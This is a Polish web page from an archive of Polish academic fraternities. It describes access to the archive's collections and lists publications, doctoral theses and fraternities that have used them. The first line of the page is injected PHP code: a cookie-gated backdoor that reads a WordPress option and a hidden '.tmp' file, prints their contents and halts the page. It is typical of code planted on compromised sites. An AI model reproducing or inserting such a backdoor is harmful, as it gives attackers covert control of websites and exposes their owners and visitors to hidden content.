if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Udostępnianie zbiorów

D. Pater, P. Tomaszewski, Od morza jesteśmy…, Toruń 2006.

Od 2001 r. zbiory Archiwum Korporacyjnego udostępniane są naukowcom, dziennikarzom, rodzinom przedwojennych korporantów, czynnie działającym korporacjom akademickim oraz innym instytucjom i osobom zainteresowanym historią polskiego ruchu korporacyjnego, dziejami poszczególnych korporacji oraz losami ich członków.

W ostatnich latach ukazały się liczne publikacje książkowe wykorzystujące zgromadzone w Archiwum zbiory (wydawnictwa, dokumenty, fotografie). Wśród nich można wymienić:

A. Gulczyński, J. Wiesiołowski (red.), Prawnicy, Kronika Miasta Poznania 2008.

- P. Grabowski (red.), Korporacja Akademicka Chrobria. Ad perpetuam rei memoriam de occasione LXXXV annis, Poznań 2006,
- D. Pater, P. Tomaszewski, Od morza jesteśmy… Świadomość pomorska w myśli i działalności akademickiego ruchu korporacyjnego w Polsce w czasach II Rzeczypospolitej, Toruń 2006,
- R. Sierchuła (red.), “Niezłomni” Lech Neyman i Stanisław Kasznica 1908-1948. Historia ostatnich przywódców NSZ, Poznań 2008,
- B. Wróblewski, Prawnicy w poznańskich korporacjach akademickich w latach 1920-1939, (w:), A. Gulczyński, J. Wiesiołowski (red.), Prawnicy, Kronika Miasta Poznania 2008, nr 3, s. 151 i n.,
- A. Gulczyński, Prawo na Zamku. Wydział Prawno-Ekonomiczny Uniwersytetu Poznańskiego w dawnej rezydencji cesarskiej, Poznań 2009,
- 150 lat szpitala w Malborku. Jak feniks z popiołów, Malbork 2010,
- M. Kandulski, P. Łącki, Rocznik Korporacyjny 2006/2007, Poznań 2010.

A. Gulczyński, Prawo na Zamku, Poznań 2009.

Materiały wykorzystywane były również w publikacjach prasowych, w tym w periodykach korporacyjnych “Korporant Polski” oraz “Komunikatach Stowarzyszenie Filistrów (Poznańskich) Korporacji Akademickich”.

Ze zbiorów Archiwum Korporacyjnego korzystano przy opracowywaniu kilku prac doktorskich i habilitacyjnych dotyczących historii m.in. polskich korporacji akademickich w dwudziestoleciu międzywojennym (dr Patryk Tomaszewski, Korporacje akademickie w Polsce w latach 1918-1939. Działalność, struktury, ideologia, Uniwersytet Mikołaja Kopernika 2009), wyższego szkolnictwa technicznego w II Rzeczypospolitej (dr Marek Jakubiak, Politechnika Warszawska), korporacji Welecja czy modelu wychowawczego w niemieckich i polskich korporacjach akademickich (Sabrina Lausen, Uniwersytet w Paderborn).

Prelekcja Michała Godlewskiego z K! Magna-Polonia dotycząca historii poznańskich korporacji akademickich, Poznań 24 III 2007 r.

Ze zgromadzonych materiałów skorzystała w ostatnich latach większość czynnie działających współcześnie w Polsce korporacji: z Trójmiasta (Konwent Polonia, Z.A.G. Wisła, Lauda), z Warszawy (Welecja, Aquilonia), z Poznania (Magna-Polonia, Lechia, Chrobria, Surma, Baltia, Masovia, Hermesia, Roma), z Torunia (Kujawja, Batoria), z Krakowa (Arcadia), z Lublina (Concordia) oraz z Wrocławia (Cresovia Leopoliensis, Slavia, Magna Polonia Vratislaviensis).

Pochodzące z Archiwum fotografie oraz utensylia korporacyjne można zobaczyć na stronach internetowych korporacji akademickich (m.in. www.magnapolonia.pl, www.lechia.org, www.surma.org.pl, www.masovia.org, www.cresovia.pl, www.korporacjaroma.pl, www.lauda.org.pl). W ostatnich latach prezentowane były także na witrynach innych korporacji (m.in. www.chrobria.org, www.hermesia.pl) oraz wielokrotnie w ramach różnego rodzaju spotkań i publicznych prelekcji.

Więcej wiadomości z lat 2007-2010 na ten temat znaleźć można w dziale Aktualności.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 21 III 2012 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }